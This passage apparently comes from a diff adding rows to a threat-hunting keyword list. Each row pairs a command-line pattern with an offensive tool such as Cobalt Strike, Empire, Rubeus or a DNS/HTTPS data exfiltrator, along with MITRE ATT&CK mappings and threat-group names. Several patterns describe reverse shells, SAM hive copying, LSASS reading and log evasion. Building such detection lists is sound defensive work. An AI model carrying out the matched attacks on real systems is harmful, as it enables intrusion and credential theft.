Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -r data/* -p * -m readfiles*portscan*","offensive_tool_keyword","SSRFmap","Automatic SSRF fuzzer and exploitation tool","T1210 - T1211 - T1212 - T1574","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/swisskyrepo/SSRFmap","1","0","N/A","N/A","10","2464","458","2023-05-27T19:30:08Z","2018-10-15T19:08:26Z" +"* radare *:* -ble*","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" +"* rai-attack-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"* rai-attack-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","0","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"* --random_user_agent*","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","3","296","53","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" +"* --random-agent *","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - 
TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"* rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"* rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"* -ratel *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"* RCE.py -*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rde1 crde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - 
TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rde1 srde_windows*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rdp * -u * -p * --nla-screenshot*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* ReadFromLsass*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 
T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","0","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" +"* -RealCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"* -RealCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* realvnc-auth-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* rec2 crde_linux*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* rec2 crde_macos*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"* redis-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* redis-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* redsocks.sh*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z" +"* --reflective-injection *","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"* -Registry -AtStartup *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -relayserver *:5555*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"* -remote -bindPipe * -bindPort * -security*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 
movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" +"* -Remote -ExchHostname *","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","0","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"* -RemoteDllHandle *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -remotefilepath *\\*.wav*","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z" +"* --remote-impersonation*","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense 
Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","8","722","107","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" +"* -RemotePath *\Windows\System32\SAM -LocalPath *\tmp\*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","0","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"* remove device GUID:001B2EE1-AE95-4146-AE7B-5928F1E4F396*","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for lateral movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","412","53","2023-09-16T17:33:11Z","2021-08-19T05:09:19Z" +"* renew *.kirbi*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* renew */ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* repo -u https://github.com/*","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","34","6","2022-11-28T20:42:23Z","2022-11-14T11:25:10Z" +"* req -username * -p * -ca * -target * -template * -upn *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -request -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* -request -format hashcat -outputfile *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --requirement *Exegol/requirements.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* resolveall.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* resu ten*","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* rev_shell.py*","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","31","17","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z"
+"* -Reverse -IPAddress * -Port *","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","0","Invoke-PowerShellTcp args","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"* reverse_shell_generator*","offensive_tool_keyword","reverse-shell-generator","Hosted Reverse Shell generator with a ton of functionality","T1059 T1071","N/A","N/A","N/A","POST Exploitation tools","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","2272","511","2023-08-12T15:06:21Z","2021-02-27T00:53:13Z"
+"* reverse-index.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"* -RevToSelf *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"* 
rexec-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
